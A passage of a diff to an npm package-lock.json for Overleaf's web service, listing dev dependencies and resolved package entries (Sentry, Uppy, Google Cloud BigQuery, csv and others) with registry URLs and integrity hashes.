"^1.8.0", + "abort-controller": "^3.0.0", + "acorn": "^7.1.1", + "acorn-walk": "^7.1.1", + "algoliasearch": "^3.35.1", + "autoprefixer": "^10.4.16", + "babel-loader": "^9.1.3", + "babel-plugin-macros": "^3.1.0", + "babel-plugin-module-resolver": "^5.0.2", + "backbone": "^1.6.0", + "bootstrap": "^3.4.1", + "bootstrap-5": "npm:bootstrap@^5.3.3", + "c8": "^7.2.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "chai-exclude": "^2.0.3", + "chart.js": "^4.0.1", + "chartjs-adapter-moment": "^1.0.1", + "chartjs-plugin-datalabels": "^2.2.0", + "cheerio": "^1.0.0-rc.3", + "classnames": "^2.2.6", + "cookie-signature": "^1.2.1", + "copy-webpack-plugin": "^11.0.0", + "core-js": "^3.38.1", + "css-loader": "^6.8.1", + "css-minimizer-webpack-plugin": "^5.0.1", + "cypress": "13.13.2", + "cypress-plugin-tab": "^1.0.5", + "d3": "^3.5.16", + "daterangepicker": "2.1.27", + "diff": "^5.1.0", + "dompurify": "^3.2.4", + "downshift": "^6.1.0", + "es6-promise": "^4.2.8", + "escodegen": "^2.0.0", + "eslint-config-standard-jsx": "^11.0.0", + "eslint-plugin-jsx-a11y": "^6.7.1", + "eslint-plugin-react": "^7.32.2", + "eslint-plugin-react-hooks": "^4.6.0", + "eslint-plugin-testing-library": "^7.1.1", + "eslint-plugin-unicorn": "^56.0.0", + "esmock": "^2.6.7", + "events": "^3.3.0", + "fake-indexeddb": "^6.0.0", + "fetch-mock": "^12.5.2", + "formik": "^2.2.9", + "fuse.js": "^3.0.0", + "glob": "^7.1.6", + "handlebars": "^4.7.8", + "handlebars-loader": "^1.7.3", + "html-webpack-plugin": "^5.5.3", + "i18next-scanner": "^4.4.0", + "jquery": "^3.7.1", + "jscodeshift": "^17.0.0", + "jsdom": "^19.0.0", + "jsdom-global": "^3.0.2", + "less": "^3.13.1", + "less-loader": "^11.1.3", + "match-sorter": "^6.2.0", + "mathjax": "^3.2.2", + "mensch": "^0.3.4", + "micromark": "^4.0.0", + "mini-css-extract-plugin": "^2.7.6", + "mocha": "^11.1.0", + "mocha-each": "^2.0.1", + "mock-fs": "^5.1.2", + "nock": "^13.5.6", + "nvd3": "^1.8.6", + "overleaf-editor-core": "*", + "pdfjs-dist": "4.10.38", + "pirates": "^4.0.1", + "postcss": "^8.4.31", + "postcss-loader": "^7.3.3", + "prop-types": "^15.7.2", + "qrcode": "^1.4.4", + "react": "^17.0.2", + "react-bootstrap-5": "npm:react-bootstrap@^2.10.5", + "react-chartjs-2": "^5.0.1", + "react-color": "^2.19.3", + "react-dnd": "^16.0.1", + "react-dnd-html5-backend": "^16.0.1", + "react-dom": "^17.0.2", + "react-error-boundary": "^2.3.1", + "react-google-recaptcha": "^3.1.0", + "react-i18next": "^13.3.1", + "react-linkify": "^1.0.0-alpha", + "react-refresh": "^0.14.0", + "react-resizable-panels": "^2.1.1", + "resolve-url-loader": "^5.0.0", + "samlp": "^7.0.2", + "sandboxed-module": "overleaf/node-sandboxed-module#cafa2d60f17ce75cc023e6f296eb8de79d92d35d", + "sass": "^1.77.1", + "sass-loader": "^14.2.1", + "scroll-into-view-if-needed": "^2.2.25", + "sinon": "^7.5.0", + "sinon-chai": "^3.7.0", + "sinon-mongoose": "^2.3.0", + "storybook": "^8.6.4", + "stylelint-config-standard-scss": "^13.1.0", + "terser-webpack-plugin": "^5.3.9", + "thread-loader": "^4.0.2", + "timekeeper": "^2.2.0", + "to-string-loader": "^1.2.0", + "tty-browserify": "^0.0.1", + "typescript": "^5.0.4", + "uuid": "^9.0.1", + "w3c-keyname": "^2.2.8", + "webpack": "^5.98.0", + "webpack-assets-manifest": "^5.2.1", + "webpack-cli": "^5.1.4", + "webpack-dev-server": "^5.2.0", + "webpack-merge": "^5.10.0", + "yup": "^0.32.11" + } + }, + "services/web/node_modules/@babel/runtime": { + "version": "7.25.7", + "resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.25.7.tgz", + "integrity": "sha512-FjoyLe754PMiYsFaN5C94ttGiOmBNYTf6pLr4xXHAT5uctHb092PBszndLDR5XA/jghQvn4n7JMHl7dmTgbm9w==", + "dev": true, + "dependencies": { + "regenerator-runtime": "^0.14.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "services/web/node_modules/@google-cloud/bigquery": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/@google-cloud/bigquery/-/bigquery-6.0.3.tgz", + "integrity": "sha512-BP464228S9dqDCb4dR99h9D8+N498YZi/AZvoOJUaieg2H6qbiYBE1xlYuaMvyV1WEQT/2/yZTCJnCo5WiaY0Q==", + "dependencies": { + "@google-cloud/common": "^4.0.0", + "@google-cloud/paginator": "^4.0.0", + "@google-cloud/promisify": "^3.0.0", + "arrify": "^2.0.1", + "big.js": "^6.0.0", + "duplexify": "^4.0.0", + "extend": "^3.0.2", + "is": "^3.3.0", + "p-event": "^4.1.0", + "readable-stream": "^4.0.0", + "stream-events": "^1.0.5", + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/@google-cloud/bigquery/node_modules/readable-stream": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-4.2.0.tgz", + "integrity": "sha512-gJrBHsaI3lgBoGMW/jHZsQ/o/TIWiu5ENCJG1BB7fuCKzpFM8GaS2UoBVt9NO+oI+3FcrBNbUkl3ilDe09aY4A==", + "dependencies": { + "abort-controller": "^3.0.0", + "buffer": "^6.0.3", + "events": "^3.3.0", + "process": "^0.11.10" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + } + }, + "services/web/node_modules/@google-cloud/bigquery/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "services/web/node_modules/@google-cloud/common": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-4.0.3.tgz", + "integrity": "sha512-fUoMo5b8iAKbrYpneIRV3z95AlxVJPrjpevxs4SKoclngWZvTXBSGpNisF5+x5m+oNGve7jfB1e6vNBZBUs7Fw==", + "dependencies": { + "@google-cloud/projectify": "^3.0.0", + "@google-cloud/promisify": "^3.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "ent": "^2.2.0", + "extend": "^3.0.2", + "google-auth-library": "^8.0.2", + "retry-request": "^5.0.0", + "teeny-request": "^8.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/@google-cloud/paginator": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-4.0.1.tgz", + "integrity": "sha512-6G1ui6bWhNyHjmbYwavdN7mpVPRBtyDg/bfqBTAlwr413On2TnFNfDxc9UhTJctkgoCDgQXEKiRPLPR9USlkbQ==", + "dependencies": { + "arrify": "^2.0.0", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/@google-cloud/projectify": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-3.0.0.tgz", + "integrity": "sha512-HRkZsNmjScY6Li8/kb70wjGlDDyLkVk3KvoEo9uIoxSjYLJasGiCch9+PqRVDOCGUFvEIqyogl+BeqILL4OJHA==", + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/@google-cloud/promisify": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-3.0.1.tgz", + "integrity": "sha512-z1CjRjtQyBOYL+5Qr9DdYIfrdLBe746jRTYfaYU6MeXkqp7UfYs/jX16lFFVzZ7PGEJvqZNqYUEtb1mvDww4pA==", + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/@overleaf/dictionaries": { + "version": "0.0.3", + "resolved": "https://github.com/overleaf/dictionaries/archive/refs/tags/v0.0.3.tar.gz", + "integrity": "sha512-/VJRrwY62Va2M4K5BE5UMruJHgKPGp0SGQkY/nrrQpBbHhMuTVoRtXkR+hcOfi1Iu6SO0vcwiK+L7xzs+fZmXQ==", + "dev": true + }, + "services/web/node_modules/@sentry/browser": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/browser/-/browser-7.46.0.tgz", + "integrity": "sha512-4rX9hKPjxzfH5LhZzO5DlS5NXQ8qZg2ibepaqEgcDHrpYh5813mjjnE4OQA8wiZ6WuG3xKFgHBrGeliD5jXz9w==", + "dev": true, + "dependencies": { + "@sentry-internal/tracing": "7.46.0", + "@sentry/core": "7.46.0", + "@sentry/replay": "7.46.0", + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/@sentry/browser/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "services/web/node_modules/@sentry/core": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/core/-/core-7.46.0.tgz", + "integrity": "sha512-BnNHGh/ZTztqQedFko7vb2u6yLs/kWesOQNivav32ZbsEpVCjcmG1gOJXh2YmGIvj3jXOC9a4xfIuh+lYFcA6A==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/@sentry/core/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "services/web/node_modules/@sentry/types": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/types/-/types-7.46.0.tgz", + "integrity": "sha512-2FMEMgt2h6u7AoELhNhu9L54GAh67KKfK2pJ1kEXJHmWxM9FSCkizjLs/t+49xtY7jEXr8qYq8bV967VfDPQ9g==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/@sentry/utils": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/utils/-/utils-7.46.0.tgz", + "integrity": "sha512-elRezDAF84guMG0OVIIZEWm6wUpgbda4HGks98CFnPsrnMm3N1bdBI9XdlxYLtf+ir5KsGR5YlEIf/a0kRUwAQ==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/@sentry/utils/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "services/web/node_modules/@sinonjs/formatio": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/@sinonjs/formatio/-/formatio-3.2.2.tgz", + "integrity": "sha512-B8SEsgd8gArBLMD6zpRw3juQ2FVSsmdd7qlevyDqzS9WTCtvF55/gAL+h6gue8ZvPYcdiPdvueM/qm//9XzyTQ==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1", + "@sinonjs/samsam": "^3.1.0" + } + }, + "services/web/node_modules/@sinonjs/samsam": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/@sinonjs/samsam/-/samsam-3.3.3.tgz", + "integrity": "sha512-bKCMKZvWIjYD0BLGnNrxVuw4dkWCYsLqFOUWw8VgKF/+5Y+mE7LfHWPIYoDXowH+3a9LsWDMo0uAP8YDosPvHQ==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.3.0", + "array-from": "^2.1.1", + "lodash": "^4.17.15" + } + }, + "services/web/node_modules/@testing-library/dom": { + "version": "9.3.0", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-9.3.0.tgz", + "integrity": "sha512-Dffe68pGwI6WlLRYR2I0piIkyole9cSBH5jGQKCGMRpHW5RHCqAUaqc2Kv0tUyd4dU4DLPKhJIjyKOnjv4tuUw==", + "dev": true, + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^5.0.1", + "aria-query": "^5.0.0", + "chalk": "^4.1.0", + "dom-accessibility-api": "^0.5.9", + "lz-string": "^1.5.0", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=14" + } + }, + "services/web/node_modules/@types/aria-query": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-5.0.1.tgz", + "integrity": "sha512-XTIieEY+gvJ39ChLcB4If5zHtPxt3Syj5rgZR+e1ctpmK8NjPf0zFqsz4JpLJT0xla9GFDKjy8Cpu331nrmE1Q==", + "dev": true + }, + "services/web/node_modules/@types/express": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/@types/express/-/express-4.17.21.tgz", + "integrity": "sha512-ejlPM315qwLpaQlQDTjPdsUFSc6ZsP4AN6AlWnogPjQ7CVi7PYF3YVz+CY3jE2pwYf7E/7HlDAN0rV2GxTG0HQ==", + "dev": true, + "dependencies": { + "@types/body-parser": "*", + "@types/express-serve-static-core": "^4.17.33", + "@types/qs": "*", + "@types/serve-static": "*" + } + }, + "services/web/node_modules/@types/mocha": { + "version": "9.1.1", + "resolved": "https://registry.npmjs.org/@types/mocha/-/mocha-9.1.1.tgz", + "integrity": "sha512-Z61JK7DKDtdKTWwLeElSEBcWGRLY8g95ic5FoQqI9CMx0ns/Ghep3B4DfcEimiKMvtamNVULVNKEsiwV3aQmXw==", + "dev": true + }, + "services/web/node_modules/@uppy/companion-client": { + "version": "3.7.0", + "resolved": "https://registry.npmjs.org/@uppy/companion-client/-/companion-client-3.7.0.tgz", + "integrity": "sha512-37qJNMkqo01SM9h2gkFbV6e+aXM02s2zAda2dGsRLRsjvl/Tx69NlmxJ3xqG/7HWRnYcbBWtspb7y0tt1i/afg==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.7.0", + "namespace-emitter": "^2.0.1", + "p-retry": "^6.1.0" + } + }, + "services/web/node_modules/@uppy/core": { + "version": "3.8.0", + "resolved": "https://registry.npmjs.org/@uppy/core/-/core-3.8.0.tgz", + "integrity": "sha512-C93vVhid929+VLGjaD9CZOLJDg8GkEGMUGveFp3Tyo/wujiG+sB3fOF+c6TzKpzPLfNtVpskU1BnI7tZrq1LWw==", + "dev": true, + "dependencies": { + "@transloadit/prettier-bytes": "0.0.9", + "@uppy/store-default": "^3.2.0", + "@uppy/utils": "^5.7.0", + "lodash": "^4.17.21", + "mime-match": "^1.0.2", + "namespace-emitter": "^2.0.1", + "nanoid": "^4.0.0", + "preact": "^10.5.13" + } + }, + "services/web/node_modules/@uppy/core/node_modules/@transloadit/prettier-bytes": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/@transloadit/prettier-bytes/-/prettier-bytes-0.0.9.tgz", + "integrity": "sha512-pCvdmea/F3Tn4hAtHqNXmjcixSaroJJ+L3STXlYJdir1g1m2mRQpWbN8a4SvgQtaw2930Ckhdx8qXdXBFMKbAA==", + "dev": true + }, + "services/web/node_modules/@uppy/dashboard": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/@uppy/dashboard/-/dashboard-3.7.1.tgz", + "integrity": "sha512-qtCMXd2Ymrw0qNGSTlEEMyyDkGUCm+wX5/VrmV9lnfT7JtlSfotUK0K6KvkBeu2v1Chsu27C6Xlq6RddZMR2xQ==", + "dev": true, + "dependencies": { + "@transloadit/prettier-bytes": "0.0.7", + "@uppy/informer": "^3.0.4", + "@uppy/provider-views": "^3.7.0", + "@uppy/status-bar": "^3.2.5", + "@uppy/thumbnail-generator": "^3.0.6", + "@uppy/utils": "^5.6.0", + "classnames": "^2.2.6", + "is-shallow-equal": "^1.0.1", + "lodash": "^4.17.21", + "memoize-one": "^6.0.0", + "nanoid": "^4.0.0", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.7.1" + } + }, + "services/web/node_modules/@uppy/drag-drop": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@uppy/drag-drop/-/drag-drop-3.0.3.tgz", + "integrity": "sha512-0bCgQKxg+9vkxQipTgrX9yQIuK9a0hZrkipm1+Ynq6jTeig49b7II1bWYnoKdiYhi6nRE4UnDJf4z09yCAU7rA==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.4.3", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.4.0" + } + }, + "services/web/node_modules/@uppy/file-input": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@uppy/file-input/-/file-input-3.0.4.tgz", + "integrity": "sha512-D7Nw9GgpABYTcC8SZluDyxd+ppe7+gJejNbPZqMpQyW1S/ME3me55dkDQaVWn8yrgv7347zO2ciue9Rfmko+rQ==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.5.2", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/informer": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@uppy/informer/-/informer-3.0.4.tgz", + "integrity": "sha512-gzocdxn8qAFsW2EryehwjghladaBgv6Isjte53FTBV7o/vjaHPP6huKGbYpljyuQi8i9V+KrmvNGslofssgJ4g==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.5.2", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/progress-bar": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@uppy/progress-bar/-/progress-bar-3.0.4.tgz", + "integrity": "sha512-sxv/mG7Uc9uyTnRvfcXBhO+TWd+UqjuW5aHXCKWwTkMgDShHR0T46sEk12q+jwgbFwyeFg3p0GU3hgUxqxiEUQ==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.5.2", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/provider-views": { + "version": "3.8.0", + "resolved": "https://registry.npmjs.org/@uppy/provider-views/-/provider-views-3.8.0.tgz", + "integrity": "sha512-sTtx5bgsg2WVR+MyF0gnnM3Z7g3CyFx+Stlz//AvB6g27EMqtqO4zwDR3mestMrETkWYov5bhhqUbt2BaeANpA==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.7.0", + "classnames": "^2.2.6", + "nanoid": "^4.0.0", + "p-queue": "^7.3.4", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.8.0" + } + }, + "services/web/node_modules/@uppy/provider-views/node_modules/eventemitter3": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/eventemitter3/-/eventemitter3-5.0.1.tgz", + "integrity": "sha512-GWkBvjiSZK87ELrYOSESUYeVIc9mvLLf/nXalMOS5dYrgZq9o5OVkbZAVM06CVxYsCwH9BDZFPlQTlPA1j4ahA==", + "dev": true, + "license": "MIT" + }, + "services/web/node_modules/@uppy/provider-views/node_modules/p-queue": { + "version": "7.4.1", + "resolved": "https://registry.npmjs.org/p-queue/-/p-queue-7.4.1.tgz", + "integrity": "sha512-vRpMXmIkYF2/1hLBKisKeVYJZ8S2tZ0zEAmIJgdVKP2nq0nh4qCdf8bgw+ZgKrkh71AOCaqzwbJJk1WtdcF3VA==", + "dev": true, + "license": "MIT", + "dependencies": { + "eventemitter3": "^5.0.1", + "p-timeout": "^5.0.2" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/web/node_modules/@uppy/provider-views/node_modules/p-timeout": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/p-timeout/-/p-timeout-5.1.0.tgz", + "integrity": "sha512-auFDyzzzGZZZdHz3BtET9VEz0SE/uMEAx7uWfGPucfzEwwe/xH0iVeZibQmANYE/hp9T2+UUZT5m+BKyrDp3Ew==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/web/node_modules/@uppy/react": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/@uppy/react/-/react-3.2.1.tgz", + "integrity": "sha512-PoLplDF6YDI7f06T8ORnJhav6CcKNSYWJETXqItZR3jcXIve6pdcCuskqd+l0yiYWf4J2IdyLQXtzgGfIJl7xQ==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.6.0", + "prop-types": "^15.6.1" + }, + "peerDependencies": { + "@uppy/core": "^3.7.1", + "@uppy/dashboard": "^3.7.1", + "@uppy/drag-drop": "^3.0.3", + "@uppy/file-input": "^3.0.4", + "@uppy/progress-bar": "^3.0.4", + "@uppy/status-bar": "^3.2.5", + "react": "^16.0.0 || ^17.0.0 || ^18.0.0" + }, + "peerDependenciesMeta": { + "@uppy/dashboard": { + "optional": true + }, + "@uppy/drag-drop": { + "optional": true + }, + "@uppy/file-input": { + "optional": true + }, + "@uppy/progress-bar": { + "optional": true + }, + "@uppy/status-bar": { + "optional": true + } + } + }, + "services/web/node_modules/@uppy/status-bar": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/@uppy/status-bar/-/status-bar-3.2.5.tgz", + "integrity": "sha512-bRSxBPio5B+Kuf6w8ll+/i9VUwG8f0FnbZ1yQvCr8J9vxhd0Z5hvwhX4NP8uzHC6ZPJHlEQOTsxzGQ6y+Mdm0A==", + "dev": true, + "dependencies": { + "@transloadit/prettier-bytes": "0.0.9", + "@uppy/utils": "^5.5.2", + "classnames": "^2.2.6", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/status-bar/node_modules/@transloadit/prettier-bytes": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/@transloadit/prettier-bytes/-/prettier-bytes-0.0.9.tgz", + "integrity": "sha512-pCvdmea/F3Tn4hAtHqNXmjcixSaroJJ+L3STXlYJdir1g1m2mRQpWbN8a4SvgQtaw2930Ckhdx8qXdXBFMKbAA==", + "dev": true + }, + "services/web/node_modules/@uppy/store-default": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/@uppy/store-default/-/store-default-3.2.0.tgz", + "integrity": "sha512-Y7t0peUG89ZKa30vM4qlRIC6uKxIfOANeMT9Nzjwcxvzz8l7es22jG3eAj9WF2F7YSu7xdsH8ODs6SIrJJ8gow==", + "dev": true + }, + "services/web/node_modules/@uppy/thumbnail-generator": { + "version": "3.0.6", + "resolved": "https://registry.npmjs.org/@uppy/thumbnail-generator/-/thumbnail-generator-3.0.6.tgz", + "integrity": "sha512-gsi/BQBiunHneXCbo8VglFbhEb0CoQXQjCyGNKoEq/deEcbXhBBDxkiGcgv83l5GZJl2jLiKWqXnXAXREkldrQ==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.5.2", + "exifr": "^7.0.0" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/utils": { + "version": "5.7.0", + "resolved": "https://registry.npmjs.org/@uppy/utils/-/utils-5.7.0.tgz", + "integrity": "sha512-AJj7gAx5YfMgyevwOxVdIP2h4Nw/O6h57wKA6gj+Lce6tMORcqzGt4yQiKBsrBI0bPyFWCbzA3vX5t0//1JCBA==", + "dev": true, + "dependencies": { + "lodash": "^4.17.21", + "preact": "^10.5.13" + } + }, + "services/web/node_modules/@uppy/xhr-upload": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@uppy/xhr-upload/-/xhr-upload-3.6.0.tgz", + "integrity": "sha512-HgWr+CvJzJXAp639AiZatdEWmRdhhN5LrjTZurAkvm9nPQarpi1bo0DChO+1bpkXWOR/1VarBbZOr8lNecEn7Q==", + "dev": true, + "dependencies": { + "@uppy/companion-client": "^3.7.0", + "@uppy/utils": "^5.7.0", + "nanoid": "^4.0.0" + }, + "peerDependencies": { + "@uppy/core": "^3.8.0" + } + }, + "services/web/node_modules/agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "license": "MIT", + "engines": { + "node": ">= 14" + } + }, + "services/web/node_modules/ajv": { + "version": "8.16.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.16.0.tgz", + "integrity": "sha512-F0twR8U1ZU67JIEtekUcLkXkoO5mMMmgGD8sK/xUFzJ805jxHQl92hImFAqqXMyMYjSPOyUPAwHYhB72g5sTXw==", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.4.1" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "services/web/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "services/web/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "services/web/node_modules/aria-query": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.3.0.tgz", + "integrity": "sha512-b0P0sZPKtyu8HkeRAfCq0IfURZK+SuwMjY1UXGBU27wpAiTwQAIlq56IbIO+ytk/JjS1fMR14ee5WBBfKi5J6A==", + "dev": true, + "dependencies": { + "dequal": "^2.0.3" + } + }, + "services/web/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "services/web/node_modules/buffer": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-6.0.3.tgz", + "integrity": "sha512-FTiCpNxtwiZZHEZbcbTIcZjERVICn9yq/pDFkTl95/AxzD1naBctN7YO68riM/gLSDY7sdrMby8hofADYuuqOA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.2.1" + } + }, + "services/web/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "services/web/node_modules/csv": { + "version": "6.2.5", + "resolved": "https://registry.npmjs.org/csv/-/csv-6.2.5.tgz", + "integrity": "sha512-T+K0H7MIrlrnP6KxYKo3lK+uLl6OC2Gmwdd81TG/VdkhKvpatl35sR7tyRSpDLGl22y2T+q9KvNHnVtn4OAscQ==", + "dependencies": { + "csv-generate": "^4.2.1", + "csv-parse": "^5.3.3", + "csv-stringify": "^6.2.3", + "stream-transform": "^3.2.1" + }, + "engines": { + "node": ">= 0.1.90" + } + }, + "services/web/node_modules/csv-generate": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/csv-generate/-/csv-generate-4.2.1.tgz", + "integrity": "sha512-w6GFHjvApv6bcJ2xdi9JGsH6ZvUBfC+vUdfefnEzurXG6hMRwzkBLnhztU2H7v7+zfCk1I/knnQ+tGbgpxWrBw==" + }, + "services/web/node_modules/csv-parse": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/csv-parse/-/csv-parse-5.3.3.tgz", + "integrity": "sha512-kEWkAPleNEdhFNkHQpFHu9RYPogsFj3dx6bCxL847fsiLgidzWg0z/O0B1kVWMJUc5ky64zGp18LX2T3DQrOfw==" + }, + "services/web/node_modules/csv-stringify": { + "version": "6.2.3", + "resolved": 